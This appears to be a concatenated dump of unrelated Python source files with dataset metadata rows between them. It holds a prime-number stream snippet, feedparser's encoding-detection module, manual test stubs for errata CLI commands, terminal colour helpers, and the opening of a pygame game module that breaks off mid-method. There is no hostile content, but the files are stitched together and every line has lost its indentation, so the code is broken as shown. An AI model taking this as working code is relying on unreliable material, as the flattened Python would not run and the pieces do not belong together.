# But I had to peek at their code for merge_all().
# (Could we make diff/merge shorter using Kragen's post on merging?)
# (Or how about defining diff in terms of merge and complement?)
def diff(xs, ys):
x, y = next(xs), next(ys)
while True:
if x < y: yield x
if x <= y: x = next(xs)
else: y = next(ys)
def merge(xs, ys):
x, y = next(xs), next(ys)
while True:
d = x - y
yield x if d <= 0 else y
if d <= 0: x = next(xs)
if 0 <= d: y = next(ys)
from itertools import count
from streams import LazyList
def gen_primes():
yield 2; yield 3; yield 5
multiples = merge_all(count(p*p, 2*p) for p in primes.tail())
for p in diff(count(7, 2), multiples): yield p
def merge_all(iters):
"Merge a stream of sorted streams, given map(next, iters) would be strictly increasing."
xs = next(iters)
yield next(xs)
for x in merge(xs, merge_all(iters)): yield x
primes = LazyList(gen_primes())
for p in primes: print(p)
| mit | 2,611,252,358,811,437,000 | 28.868421 | 92 | 0.623789 | false | 3.059299 | false | false | false |
eleonrk/SickRage | lib/feedparser/encodings.py | 19 | 12215 | # Character encoding routines
# Copyright 2010-2015 Kurt McKee <[email protected]>
# Copyright 2002-2008 Mark Pilgrim
# All rights reserved.
#
# This file is a part of feedparser.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 'AS IS'
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import absolute_import, unicode_literals
import cgi
import codecs
import collections
import re
try:
import chardet
except ImportError:
chardet = None
lazy_chardet_encoding = None
else:
def lazy_chardet_encoding(data):
chardet_encoding = chardet.detect(data)['encoding']
if not chardet_encoding:
chardet_encoding = ''
if isinstance(chardet_encoding, bytes_):
chardet_encoding = chardet_encoding.encode('ascii', 'ignore')
return chardet_encoding
from .exceptions import (
CharacterEncodingOverride, CharacterEncodingUnknown, NonXMLContentType,
)
bytes_ = type(b'')
unicode_ = type('')
# Each marker represents some of the characters of the opening XML
# processing instruction ('<?xm') in the specified encoding.
EBCDIC_MARKER = b'\x4C\x6F\xA7\x94'
UTF16BE_MARKER = b'\x00\x3C\x00\x3F'
UTF16LE_MARKER = b'\x3C\x00\x3F\x00'
UTF32BE_MARKER = b'\x00\x00\x00\x3C'
UTF32LE_MARKER = b'\x3C\x00\x00\x00'
ZERO_BYTES = '\x00\x00'
# Match the opening XML declaration.
# Example: <?xml version="1.0" encoding="utf-8"?>
RE_XML_DECLARATION = re.compile('^<\?xml[^>]*?>')
# Capture the value of the XML processing instruction's encoding attribute.
# Example: <?xml version="1.0" encoding="utf-8"?>
RE_XML_PI_ENCODING = re.compile(b'^<\?.*encoding=[\'"](.*?)[\'"].*\?>')
def convert_to_utf8(http_headers, data, result):
'''Detect and convert the character encoding to UTF-8.
http_headers is a dictionary
data is a raw string (not Unicode)'''
# This is so much trickier than it sounds, it's not even funny.
# According to RFC 3023 ('XML Media Types'), if the HTTP Content-Type
# is application/xml, application/*+xml,
# application/xml-external-parsed-entity, or application/xml-dtd,
# the encoding given in the charset parameter of the HTTP Content-Type
# takes precedence over the encoding given in the XML prefix within the
# document, and defaults to 'utf-8' if neither are specified. But, if
# the HTTP Content-Type is text/xml, text/*+xml, or
# text/xml-external-parsed-entity, the encoding given in the XML prefix
# within the document is ALWAYS IGNORED and only the encoding given in
# the charset parameter of the HTTP Content-Type header should be
# respected, and it defaults to 'us-ascii' if not specified.
# Furthermore, discussion on the atom-syntax mailing list with the
# author of RFC 3023 leads me to the conclusion that any document
# served with a Content-Type of text/* and no charset parameter
# must be treated as us-ascii. (We now do this.) And also that it
# must always be flagged as non-well-formed. (We now do this too.)
# If Content-Type is unspecified (input was local file or non-HTTP source)
# or unrecognized (server just got it totally wrong), then go by the
# encoding given in the XML prefix of the document and default to
# 'iso-8859-1' as per the HTTP specification (RFC 2616).
# Then, assuming we didn't find a character encoding in the HTTP headers
# (and the HTTP Content-type allowed us to look in the body), we need
# to sniff the first few bytes of the XML data and try to determine
# whether the encoding is ASCII-compatible. Section F of the XML
# specification shows the way here:
# http://www.w3.org/TR/REC-xml/#sec-guessing-no-ext-info
# If the sniffed encoding is not ASCII-compatible, we need to make it
# ASCII compatible so that we can sniff further into the XML declaration
# to find the encoding attribute, which will tell us the true encoding.
# Of course, none of this guarantees that we will be able to parse the
# feed in the declared character encoding (assuming it was declared
# correctly, which many are not). iconv_codec can help a lot;
# you should definitely install it if you can.
# http://cjkpython.i18n.org/
bom_encoding = ''
xml_encoding = ''
rfc3023_encoding = ''
# Look at the first few bytes of the document to guess what
# its encoding may be. We only need to decode enough of the
# document that we can use an ASCII-compatible regular
# expression to search for an XML encoding declaration.
# The heuristic follows the XML specification, section F:
# http://www.w3.org/TR/REC-xml/#sec-guessing-no-ext-info
# Check for BOMs first.
if data[:4] == codecs.BOM_UTF32_BE:
bom_encoding = 'utf-32be'
data = data[4:]
elif data[:4] == codecs.BOM_UTF32_LE:
bom_encoding = 'utf-32le'
data = data[4:]
elif data[:2] == codecs.BOM_UTF16_BE and data[2:4] != ZERO_BYTES:
bom_encoding = 'utf-16be'
data = data[2:]
elif data[:2] == codecs.BOM_UTF16_LE and data[2:4] != ZERO_BYTES:
bom_encoding = 'utf-16le'
data = data[2:]
elif data[:3] == codecs.BOM_UTF8:
bom_encoding = 'utf-8'
data = data[3:]
# Check for the characters '<?xm' in several encodings.
elif data[:4] == EBCDIC_MARKER:
bom_encoding = 'cp037'
elif data[:4] == UTF16BE_MARKER:
bom_encoding = 'utf-16be'
elif data[:4] == UTF16LE_MARKER:
bom_encoding = 'utf-16le'
elif data[:4] == UTF32BE_MARKER:
bom_encoding = 'utf-32be'
elif data[:4] == UTF32LE_MARKER:
bom_encoding = 'utf-32le'
tempdata = data
try:
if bom_encoding:
tempdata = data.decode(bom_encoding).encode('utf-8')
except (UnicodeDecodeError, LookupError):
# feedparser recognizes UTF-32 encodings that aren't
# available in Python 2.4 and 2.5, so it's possible to
# encounter a LookupError during decoding.
xml_encoding_match = None
else:
xml_encoding_match = RE_XML_PI_ENCODING.match(tempdata)
if xml_encoding_match:
xml_encoding = xml_encoding_match.groups()[0].decode('utf-8').lower()
# Normalize the xml_encoding if necessary.
if bom_encoding and (xml_encoding in (
'u16', 'utf-16', 'utf16', 'utf_16',
'u32', 'utf-32', 'utf32', 'utf_32',
'iso-10646-ucs-2', 'iso-10646-ucs-4',
'csucs4', 'csunicode', 'ucs-2', 'ucs-4'
)):
xml_encoding = bom_encoding
# Find the HTTP Content-Type and, hopefully, a character
# encoding provided by the server. The Content-Type is used
# to choose the "correct" encoding among the BOM encoding,
# XML declaration encoding, and HTTP encoding, following the
# heuristic defined in RFC 3023.
http_content_type = http_headers.get('content-type') or ''
http_content_type, params = cgi.parse_header(http_content_type)
http_encoding = params.get('charset', '').replace("'", "")
if isinstance(http_encoding, bytes_):
http_encoding = http_encoding.decode('utf-8', 'ignore')
acceptable_content_type = 0
application_content_types = ('application/xml', 'application/xml-dtd',
'application/xml-external-parsed-entity')
text_content_types = ('text/xml', 'text/xml-external-parsed-entity')
if (http_content_type in application_content_types) or \
(http_content_type.startswith('application/') and
http_content_type.endswith('+xml')):
acceptable_content_type = 1
rfc3023_encoding = http_encoding or xml_encoding or 'utf-8'
elif (http_content_type in text_content_types) or \
(http_content_type.startswith('text/') and
http_content_type.endswith('+xml')):
acceptable_content_type = 1
rfc3023_encoding = http_encoding or 'us-ascii'
elif http_content_type.startswith('text/'):
rfc3023_encoding = http_encoding or 'us-ascii'
elif http_headers and 'content-type' not in http_headers:
rfc3023_encoding = xml_encoding or 'iso-8859-1'
else:
rfc3023_encoding = xml_encoding or 'utf-8'
# gb18030 is a superset of gb2312, so always replace gb2312
# with gb18030 for greater compatibility.
if rfc3023_encoding.lower() == 'gb2312':
rfc3023_encoding = 'gb18030'
if xml_encoding.lower() == 'gb2312':
xml_encoding = 'gb18030'
# there are four encodings to keep track of:
# - http_encoding is the encoding declared in the Content-Type HTTP header
# - xml_encoding is the encoding declared in the <?xml declaration
# - bom_encoding is the encoding sniffed from the first 4 bytes of the XML data
# - rfc3023_encoding is the actual encoding, as per RFC 3023 and a variety of other conflicting specifications
error = None
if http_headers and (not acceptable_content_type):
if 'content-type' in http_headers:
msg = '%s is not an XML media type' % http_headers['content-type']
else:
msg = 'no Content-type specified'
error = NonXMLContentType(msg)
# determine character encoding
known_encoding = 0
tried_encodings = []
# try: HTTP encoding, declared XML encoding, encoding sniffed from BOM
for proposed_encoding in (rfc3023_encoding, xml_encoding, bom_encoding,
lazy_chardet_encoding, 'utf-8', 'windows-1252', 'iso-8859-2'):
if isinstance(proposed_encoding, collections.Callable):
proposed_encoding = proposed_encoding(data)
if not proposed_encoding:
continue
if proposed_encoding in tried_encodings:
continue
tried_encodings.append(proposed_encoding)
try:
data = data.decode(proposed_encoding)
except (UnicodeDecodeError, LookupError):
pass
else:
known_encoding = 1
# Update the encoding in the opening XML processing instruction.
new_declaration = '''<?xml version='1.0' encoding='utf-8'?>'''
if RE_XML_DECLARATION.search(data):
data = RE_XML_DECLARATION.sub(new_declaration, data)
else:
data = new_declaration + '\n' + data
data = data.encode('utf-8')
break
# if still no luck, give up
if not known_encoding:
error = CharacterEncodingUnknown(
'document encoding unknown, I tried ' +
'%s, %s, utf-8, windows-1252, and iso-8859-2 but nothing worked' %
(rfc3023_encoding, xml_encoding))
rfc3023_encoding = ''
elif proposed_encoding != rfc3023_encoding:
error = CharacterEncodingOverride(
'document declared as %s, but parsed as %s' %
(rfc3023_encoding, proposed_encoding))
rfc3023_encoding = proposed_encoding
result['encoding'] = rfc3023_encoding
if error:
result['bozo'] = True
result['bozo_exception'] = error
return data
| gpl-3.0 | -1,332,576,937,644,737,500 | 42.781362 | 114 | 0.665411 | false | 3.839987 | false | false | false |
abalakh/robottelo | tests/foreman/cli/test_errata.py | 1 | 15389 | # pylint: disable=too-many-public-methods
"""CLI Tests for the errata management feature"""
# For ease of use hc refers to host-collection throughout this document
from robottelo.decorators import stubbed
from robottelo.test import CLITestCase
class ErrataTestCase(CLITestCase):
"""CLI Tests for the errata management feature"""
@stubbed()
def test_hc_errata_install_1(self):
"""@Test: Using hc-id and org id to install an erratum in a hc
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. host-collection erratum install --errata <errata> --id <id>
--organization-id <orgid>
@Assert: Erratum is installed.
@Status: Manual
"""
@stubbed()
def test_hc_errata_install_2(self):
"""@Test: Using hc-id and org name to install an erratum in a hc
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. host-collection erratum install --errata <errata> --id <id>
--organization <org name>
@Assert: Erratum is installed.
@Status: Manual
"""
@stubbed()
def test_hc_errata_install_3(self):
"""@Test: Use hc-id and org label to install an erratum in a hc
@Feature: Errata
@Setup: errata synced on satellite server.
@Steps:
1. host-collection erratum install --errata <errata> --id <id>
--organization-label <org label>
@Assert: Errata is installed.
@Status: Manual
"""
@stubbed()
def test_hc_errata_install_4(self):
"""@Test: Use hc-name and org id to install an erratum in a hc
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. host-collection erratum install --errata <errata> --name <name>
--organization-id <orgid>
@Assert: Erratum is installed.
@Status: Manual
"""
@stubbed()
def test_hc_errata_install_5(self):
"""@Test: Use hc name and org name to install an erratum in a hc
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. host-collection erratum install --errata <errata> --name <name>
--organization <org name>
@Assert: Erratum is installed.
@Status: Manual
"""
@stubbed()
def test_hc_errata_install_6(self):
"""@Test: Use hc-name and org label to install an erratum in a hc
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. host-collection erratum install --errata <errata> --name <name>
--organization-label <org label>
@Assert: Erratum is installed.
@Status: Manual
"""
@stubbed()
def test_hc_errata_install_7(self):
"""@Test: Attempt to install an erratum in a hc using hc-id and not
specifying the erratum info
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. host-collection erratum install --id <id> --organization-id <orgid>
@Assert: Error message thrown.
@Status: Manual
"""
@stubbed()
def test_hc_errata_install_8(self):
"""@Test: Attempt to install an erratum in a hc using hc-name and not
specifying the erratum info
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. host-collection erratum install --name <name> --organization-id
<orgid>
@Assert: Error message thrown.
@Status: Manual
"""
@stubbed()
def test_hc_errata_install_9(self):
"""@Test: Attempt to install an erratum in a hc by not specifying hc
info
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. host-collection erratum install --errata <errata> --organization-id
<orgid>
@Assert: Error message thrown.
@Status: Manual
"""
@stubbed()
def test_hc_errata_install_10(self):
"""@Test: Attempt to install an erratum in a hc using hc-id and not
specifying org info
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. host-collection erratum install --errata <errata> --id <id>
@Assert: Error message thrown.
@Status: Manual
"""
@stubbed()
def test_hc_errata_install_11(self):
"""@Test: Attempt to install an erratum in a hc without specifying hc
info
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. host-collection erratum install --errata <errata> --name <name>
@Assert: Error message thrown.
@Status: Manual
"""
@stubbed()
def test_errata_list_sort_1(self):
"""@Test: Sort errata by Issued date
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. erratum list --order 'issued ASC'
2. erratum list --order 'issued DESC'
@Assert: Errata is sorted by Issued date.
@Status: Manual
"""
@stubbed()
def test_errata_list_sort_2(self):
"""@Test: Filter errata by org id and sort by updated date
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. erratum list --organization-id=<orgid> --order 'updated ASC'
2. erratum list --organization-id=<orgid> --order 'updated DESC'
@Assert: Errata is filtered by org id and sorted by updated date.
@Status: Manual
"""
@stubbed()
def test_errata_list_sort_3(self):
"""@Test: Filter errata by org name and sort by updated date
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. erratum list --organization=<org name> --order 'updated ASC'
2. erratum list --organization=<org name> --order 'updated DESC'
@Assert: Errata is filtered by org name and sorted by updated date.
@Status: Manual
"""
@stubbed()
def test_errata_list_sort_4(self):
"""@Test: Filter errata by org label and sort by updated date
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. erratum list --organization-label=<org_label> --order 'updated ASC'
2. erratum list --organization-label=<org_label> --order 'updated DESC'
@Assert: Errata is filtered by org label and sorted by updated date.
@Status: Manual
"""
@stubbed()
def test_errata_list_sort_5(self):
"""@Test: Filter errata by org id and sort by issued date
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. erratum list --organization-id=<org_id> --order 'issued ASC'
2. erratum list --organization-id=<org_id> --order 'issued DESC'
@Assert: Errata is filtered by org id and sorted by issued date.
@Status: Manual
"""
@stubbed()
def test_errata_list_sort_6(self):
"""@Test: Filter errata by org name and sort by issued date
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. erratum list --organization=<org_name> --order 'issued ASC'
2. erratum list --organization=<org_name> --order 'issued DESC'
@Assert: Errata is filtered by org name and sorted by issued date.
@Status: Manual
"""
@stubbed()
def test_errata_list_sort_7(self):
"""@Test: Filter errata by org label and sort by issued date
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. erratum list --organization-label=<org_label> --order 'issued ASC'
2. erratum list --organization-label=<org_label> --order 'issued DESC'
@Assert: Errata is filtered by org label and sorted by issued date.
@Status: Manual
"""
@stubbed()
def test_errata_list_1(self):
"""@Test: Filter errata by product id
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. erratum list --product-id=<productid>
@Assert: Errata is filtered by product id.
@Status: Manual
"""
@stubbed()
def test_errata_list_2(self):
"""@Test: Filter errata by product name
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. erratum list --product=<productname>
@Assert: Errata is filtered by product name.
@Status: Manual
"""
@stubbed()
def test_errata_list_3(self):
"""@Test: Filter errata by product id and Org id
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. erratum list --product-id=<product_id> --organization-id=<org_id>
@Assert: Errata is filtered by product id and Org id.
@Status: Manual
"""
@stubbed()
def test_errata_list_4(self):
"""@Test: Filter errata by product id and Org name
@Feature: Errata
@Setup: errata synced on satellite server.
@Steps:
1. erratum list --product-id=<product_id> --organization=<org_name>
@Assert: Errata is filtered by product id and Org name.
@Status: Manual
"""
@stubbed()
def test_errata_list_5(self):
"""@Test: Filter errata by product id
@Feature: Errata
@Setup: errata synced on satellite server.
@Steps:
1. erratum list --product-id=<productid>
2. erratum list --product-id=<product_id> --organization-id=<org_id>
3. erratum list --product-id=<product_id> --organization=<org_name>
4. erratum list --product-id=<product_id>
--organization-label=<org_label>
@Assert: Errata is filtered by product id.
@Status: Manual
"""
@stubbed()
def test_errata_list_6(self):
"""@Test: Filter errata by product name
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. erratum list --product=<productname>
@Assert: Errata is filtered by product name.
@Status: Manual
"""
@stubbed()
def test_errata_list_7(self):
"""@Test: Filter errata by product name and Org id
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. erratum list --product=<product_name> --organization-id=<org_id>
@Assert: Errata is filtered by product name and Org id.
@Status: Manual
"""
@stubbed()
def test_errata_list_8(self):
"""@Test: Filter errata by product name and Org name
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. erratum list --product=<product_name> --organization=<org_name>
@Assert: Errata is filtered by product name and Org name.
@Status: Manual
"""
@stubbed()
def test_errata_list_9(self):
"""@Test: Filter errata by product name and Org label
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. erratum list --product=<product_name>
--organization-label=<org_label>
@Assert: Errata is filtered by product name and Org label.
@Status: Manual
"""
@stubbed()
def test_errata_list_10(self):
"""@Test: Filter errata by Org id
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. erratum list --organization-id=<orgid>
@Assert: Errata is filtered by Org id.
@Status: Manual
"""
@stubbed()
def test_errata_list_11(self):
"""@Test: Filter errata by Org name
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. erratum list --organization=<org name>
@Assert: Errata is filtered by Org name.
@Status: Manual
"""
@stubbed()
def test_errata_list_12(self):
"""@Test: Filter errata by Org label
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. erratum list --organization-label=<org_label>
@Assert: Errata is filtered by Org label.
@Status: Manual
"""
@stubbed()
def test_errata_list_13(self):
"""@Test: Filter errata by CVE
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. erratum list --cve <cve_id>
@Assert: Errata is filtered by CVE.
@Status: Manual
"""
@stubbed()
def test_errata_list_permission_1(self):
"""@Test: Show errata only if the User has permissions to view them
@Feature: Errata
@Setup:
1. Create two products with one repo each. Sync them.
2. Make sure that they both have errata.
3. Create a user with view access on one product and not on the other.
@Steps:
1. erratum list --organization-id=<orgid>
@Assert: Check that the new user is able to see errata for one
product only.
@Status: Manual
"""
@stubbed()
def test_errata_systems_list_1(self):
"""@Test: View a list of affected content hosts for an erratum
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. content-host list --erratum-id=<erratum_id>
--organization-id=<org_id>
@Assert: List of affected content hosts for an erratum is displayed.
@Status: Manual
"""
@stubbed()
def test_errata_systems_list_2(self):
"""@Test: View a list of affected content hosts for an erratum filtered
with restrict flags
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. content-host list --erratum-id=<erratum_id>
--organization-id=<org_id> --erratum-restrict-available=1
2. content-host list --erratum-id=<erratum_id>
--organization-id=<org_id> --erratum-restrict-unavailable=1
3. content-host list --erratum-id=<erratum_id>
--organization-id=<org_id> --erratum-restrict-available=0
4. content-host list --erratum-id=<erratum_id>
--organization-id=<org_id> --erratum-restrict-unavailable=0
@Assert: List of affected content hosts for an erratum is displayed
filtered with corresponding restrict flags.
@Status: Manual
"""
@stubbed()
def test_errata_content_host_1(self):
"""@Test: Available errata count displayed while viewing a list of
Content hosts
@Feature: Errata
@Setup:
1. Errata synced on satellite server.
2. Some content hosts present.
@Steps:
1. hammer content-host list --organization-id=<orgid>
@Assert: The available errata count is retrieved.
@Status: Manual
"""
| gpl-3.0 | 3,391,724,014,069,024,000 | 21.465693 | 79 | 0.584248 | false | 3.796004 | true | false | false |
zverevalexei/trex-http-proxy | trex_client/stf/trex_stf_lib/text_opts.py | 4 | 5153 | import json
import re
TEXT_CODES = {'bold': {'start': '\x1b[1m',
'end': '\x1b[22m'},
'cyan': {'start': '\x1b[36m',
'end': '\x1b[39m'},
'blue': {'start': '\x1b[34m',
'end': '\x1b[39m'},
'red': {'start': '\x1b[31m',
'end': '\x1b[39m'},
'magenta': {'start': '\x1b[35m',
'end': '\x1b[39m'},
'green': {'start': '\x1b[32m',
'end': '\x1b[39m'},
'yellow': {'start': '\x1b[33m',
'end': '\x1b[39m'},
'underline': {'start': '\x1b[4m',
'end': '\x1b[24m'}}
class TextCodesStripper:
keys = [re.escape(v['start']) for k,v in TEXT_CODES.iteritems()]
keys += [re.escape(v['end']) for k,v in TEXT_CODES.iteritems()]
pattern = re.compile("|".join(keys))
@staticmethod
def strip (s):
return re.sub(TextCodesStripper.pattern, '', s)
def format_num (size, suffix = "", compact = True, opts = ()):
txt = "NaN"
if type(size) == str:
return "N/A"
u = ''
if compact:
for unit in ['','K','M','G','T','P']:
if abs(size) < 1000.0:
u = unit
break
size /= 1000.0
if isinstance(size, float):
txt = "%3.2f" % (size)
else:
txt = "{:,}".format(size)
if u or suffix:
txt += " {:}{:}".format(u, suffix)
if isinstance(opts, tuple):
return format_text(txt, *opts)
else:
return format_text(txt, (opts))
def format_time (t_sec):
if t_sec < 0:
return "infinite"
if t_sec < 1:
# low numbers
for unit in ['ms', 'usec', 'ns']:
t_sec *= 1000.0
if t_sec >= 1.0:
return '{:,.2f} [{:}]'.format(t_sec, unit)
return "NaN"
else:
# seconds
if t_sec < 60.0:
return '{:,.2f} [{:}]'.format(t_sec, 'sec')
# minutes
t_sec /= 60.0
if t_sec < 60.0:
return '{:,.2f} [{:}]'.format(t_sec, 'minutes')
# hours
t_sec /= 60.0
if t_sec < 24.0:
return '{:,.2f} [{:}]'.format(t_sec, 'hours')
# days
t_sec /= 24.0
return '{:,.2f} [{:}]'.format(t_sec, 'days')
def format_percentage (size):
return "%0.2f %%" % (size)
def bold(text):
return text_attribute(text, 'bold')
def cyan(text):
return text_attribute(text, 'cyan')
def blue(text):
return text_attribute(text, 'blue')
def red(text):
return text_attribute(text, 'red')
def magenta(text):
return text_attribute(text, 'magenta')
def green(text):
return text_attribute(text, 'green')
def yellow(text):
return text_attribute(text, 'yellow')
def underline(text):
return text_attribute(text, 'underline')
def text_attribute(text, attribute):
if isinstance(text, str):
return "{start}{txt}{stop}".format(start=TEXT_CODES[attribute]['start'],
txt=text,
stop=TEXT_CODES[attribute]['end'])
elif isinstance(text, unicode):
return u"{start}{txt}{stop}".format(start=TEXT_CODES[attribute]['start'],
txt=text,
stop=TEXT_CODES[attribute]['end'])
else:
raise Exception("not a string")
FUNC_DICT = {'blue': blue,
'bold': bold,
'green': green,
'yellow': yellow,
'cyan': cyan,
'magenta': magenta,
'underline': underline,
'red': red}
def format_text(text, *args):
return_string = text
for i in args:
func = FUNC_DICT.get(i)
if func:
return_string = func(return_string)
return return_string
def format_threshold (value, red_zone, green_zone):
if value >= red_zone[0] and value <= red_zone[1]:
return format_text("{0}".format(value), 'red')
if value >= green_zone[0] and value <= green_zone[1]:
return format_text("{0}".format(value), 'green')
return "{0}".format(value)
# pretty print for JSON
def pretty_json (json_str, use_colors = True):
pretty_str = json.dumps(json.loads(json_str), indent = 4, separators=(',', ': '), sort_keys = True)
if not use_colors:
return pretty_str
try:
# int numbers
pretty_str = re.sub(r'([ ]*:[ ]+)(\-?[1-9][0-9]*[^.])',r'\1{0}'.format(blue(r'\2')), pretty_str)
# float
pretty_str = re.sub(r'([ ]*:[ ]+)(\-?[1-9][0-9]*\.[0-9]+)',r'\1{0}'.format(magenta(r'\2')), pretty_str)
# # strings
#
pretty_str = re.sub(r'([ ]*:[ ]+)("[^"]*")',r'\1{0}'.format(red(r'\2')), pretty_str)
pretty_str = re.sub(r"('[^']*')", r'{0}\1{1}'.format(TEXT_CODES['magenta']['start'],
TEXT_CODES['red']['start']), pretty_str)
except :
pass
return pretty_str
if __name__ == "__main__":
pass
| mit | -12,226,227,152,173,916 | 25.838542 | 111 | 0.465554 | false | 3.396836 | false | false | false |
wesleywerner/conspire | src/view.py | 1 | 31498 | import os
import textwrap
import random
import pygame
from pygame.locals import *
from const import *
FRAMERATE = 30
CANVAS_SIZE = (600, 600)
TEXT = (124, 164, 128)
BORDER = (64, 80, 116)
TRANSPARENT = (255, 0, 255)
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
RED = (255, 0, 0)
GREEN = (0, 220, 0)
BLUE = (0, 0, 220)
PURPLE = (220, 0, 220)
# parts definition for source image rect
PARTS_RECT = {
'human torso': (16,35,39,104),
'human head': (20,0,32,37),
'human right arm': (0,47,18,81),
'human left arm': (53,47,18,81),
'human right leg': (12,130,20,69),
'human left leg': (39,130,20,69),
'alien torso': (92,35,39,102),
'alien head': (96,0,32,37),
'alien right arm': (76,47,18,81),
'alien left arm': (129,47,18,81),
'alien right leg': (88,130,20,69),
'alien left leg': (115,130,20,69),
'trex torso': (242,51,92,117),
'trex head': (174,123,56,72),
'trex tail': (160,0,131,46),
'trex legs': (168,53,66,63),
'cyclops torso': (371,60,43,65),
'cyclops skull': (379,0,48,59),
'cyclops right arm': (334,43,35,74),
'cyclops left arm': (416,61,35,48),
'cyclops right leg': (358,127,26,63),
'cyclops left leg': (402,127,31,61),
'ptreodactyl torso': (543,58,50,87),
'ptreodactyl skull': (543,0,72,58),
'ptreodactyl right wing': (453,19,90,147),
'ptreodactyl left wing': (615,0,54,150),
'tax returns': (677,0,75,100),
'shopping list': (677,0,75,100),
'todo list': (677,0,75,100),
'ludum dare comments': (677,0,75,100),
'bank accounts': (677,0,75,100),
'website passwords': (677,0,75,100),
'IP address scamlist': (677,0,75,100),
'codex page I': (677,0,75,100),
'codex page II': (677,0,75,100),
'codex page III': (677,0,75,100),
'codex page IV': (677,0,75,100),
'codex page V': (677,0,75,100),
'codex page VI': (677,0,75,100),
'biblical references': (677,0,75,100),
'book of psalms': (677,0,75,100),
'book of tomas': (677,0,75,100),
}
UFO_RECT = (6,6,88,88)
FIGHTER_RECT = (113,12,74,75)
LIGHTFIGHTER_RECT = (313,12,74,75)
MISSILE_RECT = (194,12,4,28)
RADAR_RECT = (210,10,80,80)
RADAR_HOSTILE_RECT = (245,3,4,4)
RADAR_GOAL_RECT = (250,3,4,4)
GREEN_ZONE_RECT = (400, 19, 100,52)
class DraggableSprite(pygame.sprite.Sprite):
def __init__(self, name, image, rect):
pygame.sprite.Sprite.__init__(self)
self.name = name
self.image = image
self.rect = rect
class AFOSprite(pygame.sprite.Sprite):
"""
Player controller Air Force One sprite.
"""
def __init__(self, image):
pygame.sprite.Sprite.__init__(self)
self.name = 'AFO'
self.original_image = image
self.image = image
self.rect = image.get_rect()
self.fly_region = 0
self.speed = [0, 0]
self.autopilot = True
self.health = 10
def _accelerate(self, x, y):
self.speed = [self.speed[0] + x, self.speed[1] + y]
if self.speed[0] < -10:
self.speed[0] = -10
if self.speed[1] < -10:
self.speed[1] = -10
if self.speed[0] > 10:
self.speed[0] = 10
if self.speed[1] > 10:
self.speed[1] = 10
def _clamp(self):
if self.rect.left < 10:
self.rect.left = 10
if self.rect.top < 10:
self.rect.top = 10
if self.rect.right > CANVAS_SIZE[0] - 10:
self.rect.right = CANVAS_SIZE[0] - 10
if self.rect.top > self.fly_region:
self.rect.top = self.fly_region
def update(self):
"""
Player controller craft.
"""
# auto move the UFO forward until we are in the top half of the screen
if self.rect.top > self.fly_region:
self.rect.top -= 6
if self.rect.top < self.fly_region:
self.autopilot = False
pressed = pygame.key.get_pressed()
lose_acceleration = True
if not self.autopilot and self.health > 0:
if pressed[K_LEFT] or pressed[K_a]:
self._accelerate(-1, 0)
lose_acceleration = False
if pressed[K_RIGHT] or pressed[K_d]:
self._accelerate(1, 0)
lose_acceleration = False
if pressed[K_UP] or pressed[K_w]:
self._accelerate(0, -1)
lose_acceleration = False
if pressed[K_DOWN] or pressed[K_s]:
self._accelerate(0, 1)
lose_acceleration = False
if pressed[K_F10]:
self.health = 0
self._clamp()
self.rect.left += self.speed[0]
self.rect.top += self.speed[1]
if lose_acceleration:
if self.speed[0] > 0:
self.speed[0] -= 1
elif self.speed[0] < 0:
self.speed[0] += 1
if self.speed[1] > 0:
self.speed[1] -= 1
